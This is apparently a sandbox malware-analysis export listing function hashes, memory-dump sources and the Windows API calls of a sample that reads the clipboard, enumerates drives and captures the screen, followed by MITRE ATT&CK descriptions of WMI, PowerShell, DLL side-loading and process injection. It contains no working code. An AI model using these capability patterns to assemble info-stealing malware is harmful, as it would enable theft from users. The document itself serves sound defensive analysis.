Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c35b802276cb4cab2e01238cfef8ad4f73f74ed2e8d92cb0ff5c3d327f1c90cc
Instruction ID: ce15afb6e8349f4df79a6844a38630f2605c57d7838470a331403b3b5471d388
Opcode Fuzzy Hash: c35b802276cb4cab2e01238cfef8ad4f73f74ed2e8d92cb0ff5c3d327f1c90cc
Instruction Fuzzy Hash: 6D01F2745082828EEB128F29D0107A7FBE0EF63314F18969AC4D58F6C3C379D885C7A9

Function 0040C3EC Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd38a00dc9aa6d99ca01aac821546609123fc2e2b8e046733f98ea8146a72aec
Instruction ID: c0b4a7645aed046faff80445a1a00849260a9e0a604dc3165cb580035c2becad
Opcode Fuzzy Hash: cd38a00dc9aa6d99ca01aac821546609123fc2e2b8e046733f98ea8146a72aec
Instruction Fuzzy Hash: C5110C7025C3808FD7148F54D9D576BBBE1ABD2304F244A2CD5C127292D7F5890987A7

Function 0214BAE9 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6779701cec66d85e342211494ba6ca2ab48124764d9d56f55accc6aa658e0e4
Instruction ID: 17b0a2e189896c30c40f98a051f3158d6366074ad7805bfca47a7d541596e06f
Opcode Fuzzy Hash: b6779701cec66d85e342211494ba6ca2ab48124764d9d56f55accc6aa658e0e4
Instruction Fuzzy Hash: 2301A2205082C28FEB124F288410BA6FFE0AF53328F1896C6C0D98F6C3C769DA45C765

Function 0041AEFF Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
Instruction ID: 743bb6218d146487c45d38f060deef663a31a3ebd16d578a5b80eb567479d545
Opcode Fuzzy Hash: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
Instruction Fuzzy Hash: FA01A2205082C28EE7128F2984207B6FFA0EF63314F1896C7D4D58F6C3C3699985C7A9

Function 0214B166 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
Instruction ID: ba986036321a6ad8cc5a805ad3ef142464f07c0081f3614e815ac80c0bfc384e
Opcode Fuzzy Hash: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
Instruction Fuzzy Hash: FF0162205082C28FEB124F299410BB5FFE0AF53318F1896D6D5D98F6C3D76A8545C765

Function 0040C334 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
Instruction ID: 19ad3dfdcd8e9eec61f1e1188f3eb7c49d356ea6c47e6a039e33f49038878d3c
Opcode Fuzzy Hash: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
Instruction Fuzzy Hash: 0D11087465C3808BD318CF18D9C075BBBE29BD6314F244A2CD5C117295C7B5990ACB6A

Function 0213C59B Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
Instruction ID: fa8cb1b49d06b21749ef45e97c534c2b6eaa7867e4b0f283ce2c6365565d886e
Opcode Fuzzy Hash: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
Instruction Fuzzy Hash: 5F11047465C3808BD318CF28D98076ABBE2ABC6214F244A2CE5C117256C7B1950ACBA6

Function 0214773F Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fc9c2b9ab787b67918dace5e316ea39913c3e7de64737a5f9c964aa54dc5f10
Instruction ID: 69377d8688efb5d1df8d120b28772ee3789ec169fdbb0e7bb802b79233416e6b
Opcode Fuzzy Hash: 0fc9c2b9ab787b67918dace5e316ea39913c3e7de64737a5f9c964aa54dc5f10
Instruction Fuzzy Hash: A201FD6154D3C14BD72A8F3494687EABBE18F93329F0848AEC0C547182EB39814BC72A

Function 0043F0E0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ecd1faefde76f36583f38613df2e5eb9d8d0823934d6840002cbd1f744ed8a38
Instruction ID: 0c7a45b7bc69abfe1ea4a300e8af6adda297262347155a361b302868447e3dd6
Opcode Fuzzy Hash: ecd1faefde76f36583f38613df2e5eb9d8d0823934d6840002cbd1f744ed8a38
Instruction Fuzzy Hash: AFF0D635904214BBD5104F49EC81D37737DE7CE768F141329E514122A2A732AD1186A9

Function 0216F347 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5d7cfea0e4e327b9eda319c71044655f3c20aae259e9c189ca88ac76d4abae3
Instruction ID: 245c71e4c01125f3d54616139385685ff059a0c04d93c0d062247f71ef5c1b0f
Opcode Fuzzy Hash: f5d7cfea0e4e327b9eda319c71044655f3c20aae259e9c189ca88ac76d4abae3
Instruction Fuzzy Hash: 69F0F975644218BBC2104B49EC85D3F776EEBCE768F180318F41552561E332FD22C7A9

Function 0215B8B5 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6146b7094830001aaaf13cb0f51437480e6ddd60403108575e1b98eecd2c1ab1
Instruction ID: 4369cc8bb06881e9507b37e45818674fa9b45e33cd82c0fa4c3e52a0ca965482
Opcode Fuzzy Hash: 6146b7094830001aaaf13cb0f51437480e6ddd60403108575e1b98eecd2c1ab1
Instruction Fuzzy Hash: EBF096F4A4C621DFD6198F18DC4263A73A6EF87358F14456CE46517178D331A911CA09

Function 00418672 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0bff55706ff93967b4313bb2a1d7a7ee9ee426091711acca18b712e24a09905
Instruction ID: c14077b8a130247762470a12415ef9365636b0c970e2bf5ce29861a99db5fcbf
Opcode Fuzzy Hash: d0bff55706ff93967b4313bb2a1d7a7ee9ee426091711acca18b712e24a09905
Instruction Fuzzy Hash: B2F08238502120EEC7588F189EC157D73A2F747311729147EC406A31A0DF34ACD2C90E

Function 021458FA Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fba0dd296d97388ae8806046d0d018cb5991b0a5fc03ca011737e50afd9cac09
Instruction ID: 22a325da36a810b09e06410063065be1bdae9476d7ab0675f17a704d05f0afaa
Opcode Fuzzy Hash: fba0dd296d97388ae8806046d0d018cb5991b0a5fc03ca011737e50afd9cac09
Instruction Fuzzy Hash: 5AF0B835A49211EFE728CF08D89053DB363FB86328FD88238E0A8470A0CB3078618A48

Function 02156BA7 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beb5adae6fff6175e383ddf1efeefbc8f00a994d28ce3fd0efda4cde5bc363b2
Instruction ID: 0fd487cc5468cfd5c1360b2d2f2dfcbbb5c60acad09223ab1015b19871ad4e0b
Opcode Fuzzy Hash: beb5adae6fff6175e383ddf1efeefbc8f00a994d28ce3fd0efda4cde5bc363b2
Instruction Fuzzy Hash: 7CF08274A81021EFD7588B18D845A3EF373FB86325FA991A4D925231E0D330BC12CA48

Function 0040CEC7 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
Instruction ID: 7afc85315bce952cb7d9511845f2cfe5cc4fdaba4f93361a027a170bce18a72b
Opcode Fuzzy Hash: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
Instruction Fuzzy Hash: B2E07D3461DA008BE218EF12D95543B73B2AF82308711587E91D3276D2CE78A806DB5D

Function 0213D12E Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
Instruction ID: da0236ae2b8dcc8698b42a9d551c648567b6e2bf7713c1cdff71c8792a4b1b79
Opcode Fuzzy Hash: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
Instruction Fuzzy Hash: BCE07D346986C08FC21AEB15DC7083973A7AF81308723543D905707E51CB74A84ADF0E

Function 0042B652 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf2067ab6f32b58c45c9008d31a8987c58cfc8b8a777689b5c00e406fa9fe567
Instruction ID: 85f90f05b7cd9740f0dd11be4e47d539d37879f59d8f753959adedc7e492877d
Opcode Fuzzy Hash: bf2067ab6f32b58c45c9008d31a8987c58cfc8b8a777689b5c00e406fa9fe567
Instruction Fuzzy Hash: 72E08678B18231DBD6148F05F99163AB3A1EFD7305F98543F904657620E334AC02C68F

Function 0041F2A0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: 3e00189c545ef2cffbc0a4c45a62ec63a19577d5de140b8962752aa3758dc2ad
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: EDD0A7755487A10E9759CD3804A04B7FBE8E947612B1814EFE4D5E7205D239DC46469C

Function 0214F507 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: fdd1ed88eb7c8cd9397f1caeae76fbbd09d6961d5ffd4c31d25f73868b30e69f
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: 31D097309883A00E47288E3810A083BFBE4EA43012B08108EE0C5EB204D320EC028658

Function 0040D334 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
Instruction ID: 8c6602917fdb956e33e5ed0c062c44bb8739f147fa9184780212f41d8b26cb24
Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
Instruction Fuzzy Hash: 50C04C69E6C4008B924CCB15AC5153266769B8B254715E03A841663255E234945B950D

Function 0213D59B Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
Instruction ID: d0129799e4f617702e88ee2317aa38f8b48fef163125b91d736ab0f86673d222
Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
Instruction Fuzzy Hash: CCC04C69A6C4008A924DCB15AC5053162779B8B254715E029802A53256E2249457C94D

Function 021721EA Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
Instruction ID: d46756a0e1fb04911aea311e00f3b6d6bbb29cfd6f8012ad29779e734c60ec08
Opcode Fuzzy Hash: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
Instruction Fuzzy Hash: D7B002749493418BD380CF18D545726F6F0B747615F142919A054F3151D374D9488A5E

Function 02171C3E Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
Instruction ID: c018d795f0dc3322a67de82126959776e6cc80093cc23c5047751edba26d1c35
Opcode Fuzzy Hash: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
Instruction Fuzzy Hash: BC900224D49100CA81408F45A480570E278630B10DF1534109008F3011C210D404450C

Function 02166A57 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 109clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 02166A6B
GetClipboardData.USER32 ref: 02166A86
GlobalLock.KERNEL32 ref: 02166A9F
GetWindowLongW.USER32 ref: 02166B04
GlobalUnlock.KERNEL32 ref: 02166BC0
CloseClipboard.USER32 ref: 02166BC9

Strings

E, xrefs: 02166B1A
C, xrefs: 02166B1F
B, xrefs: 02166B2E
@, xrefs: 02166B51
F, xrefs: 02166B47
O, xrefs: 02166B33
t, xrefs: 02166B3D
N, xrefs: 02166B29
K, xrefs: 02166B4C
}, xrefs: 02166B38
{, xrefs: 02166B24

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: @$B$C$E$F$K$N$O$t${$}
API String ID: 2832541153-984153585
Opcode ID: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
Instruction ID: 5ee23a0c359e8ddfe095cbec1a048b9d5c3dd93a64b71baa574002b0fb198455
Opcode Fuzzy Hash: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
Instruction Fuzzy Hash: 60414A7050C3818ED311AF78948832FBFE5AB92318F05096DE4D986292D7BDC548CBA7

Function 021555CF Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 106COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 0215572D

Strings

1D6Z, xrefs: 02155602
%\)R, xrefs: 02155612
,X*^, xrefs: 0215560A
:@&F, xrefs: 021555FA
.T'j, xrefs: 02155622
C`<f, xrefs: 0215563A
?P:V, xrefs: 0215561A

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID: DrivesLogical
String ID: %\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f
API String ID: 999431828-351939610
Opcode ID: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
Instruction ID: c0a169318dafa95590f7cd8ccb1fcaba164b2d5b4a16e24b7cbb018ab237c84d
Opcode Fuzzy Hash: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
Instruction Fuzzy Hash: 1A31D8B4149394CFC7108F29C85122BBBF2EFC1314F40989CE9A64B620E7799946CB42

Function 02166BE7 Relevance: 12.1, APIs: 8, Instructions: 67windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 02166BF0
GetCurrentObject.GDI32(00000000,00000007), ref: 02166C11
GetObjectW.GDI32(00000000,00000018,?), ref: 02166C21
DeleteObject.GDI32(00000000), ref: 02166C28
CreateCompatibleDC.GDI32(00000000), ref: 02166C37
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02166C42
SelectObject.GDI32(00000000,00000000), ref: 02166C4E
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 02166C71

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelect
String ID:
API String ID: 2843486406-0
Opcode ID: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
Instruction ID: 8d62712f38045fc901453711abe17184cb0d5f35dfdce6053bd34ca197465ac6
Opcode Fuzzy Hash: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
Instruction Fuzzy Hash: CF214FB9544310EFE3509F609C49B2B7BF9EB8AB11F014929FA59A2290D77498048B67

Function 02155367 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 02155411

Strings

+$e, xrefs: 02155459
E#G, xrefs: 021553A1
XY, xrefs: 021553AD
+$e, xrefs: 021553CC, 021553E1

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: +$e$+$e$XY$E#G
API String ID: 237503144-1023387988
Opcode ID: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
Instruction ID: 0a736a2bf64f23d542f1399e9861002a2214d1f14811e1577c7661baee8e0e6a
Opcode Fuzzy Hash: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
Instruction Fuzzy Hash: C421063424C354AFE3148F65E88175FBBE1EBC6714F25C92CE5A85B282D775C80A8F86

Function 02155A47 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 02155B5B

Strings

rp, xrefs: 02155A9B
`J/H, xrefs: 02155A8D
B"@, xrefs: 02155A7F

Memory Dump Source

Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: B"@$`J/H$rp
API String ID: 237503144-3817236508
Opcode ID: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
Instruction ID: 1ad4d5ae16f33d5edd64740f372be2fdb3c53aac93ecd308c988fb5498167533
Opcode Fuzzy Hash: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
Instruction Fuzzy Hash: 7C31CDB0E443589FDB10CFA9D8827DEBBB2EF45700F50002CE451BB295D6B55906CFA9

Function 0042F0FD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 160COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 0042F23F

Strings

Wu, xrefs: 0042F23F
aN@, xrefs: 0042F2FC

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: FreeLibrary
String ID: aN@$Wu
API String ID: 3664257935-2510175649
Opcode ID: 6923c55db78119380e5fe35a3321c238481177c04641367e3fdf37507d6e1cbb
Instruction ID: fb7b49653fcfe6187a11668ca7033b53e8d7d933bb39412ee55706a61e0bd157
Opcode Fuzzy Hash: 6923c55db78119380e5fe35a3321c238481177c04641367e3fdf37507d6e1cbb
Instruction Fuzzy Hash: 5951777460C3C08BE3358B299C557ABBFE29FE2308F48096DE0D95B3D2DA74440AC75A

Function 0040BA80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00408A9E), ref: 0040BA86
FreeLibrary.KERNEL32 ref: 0040BAA7

Strings

Wu, xrefs: 0040BA86, 0040BAA7

Memory Dump Source

Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd

Similarity

API ID: FreeLibrary
String ID: Wu
API String ID: 3664257935-4083010176
Opcode ID: 880272bc0811b14ab5181b2bf88990afbeca93da92f698920aa63cdcc06e2724
Instruction ID: 76f8199259777ce60f51c6d99c718f1815bb22ab62b72bec75753df54c08d8dc
Opcode Fuzzy Hash: 880272bc0811b14ab5181b2bf88990afbeca93da92f698920aa63cdcc06e2724
Instruction Fuzzy Hash: E2C0023B8620009BDE857FA0FD898187A31FB4A30531C44B4B80140036DAA20960AA59

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

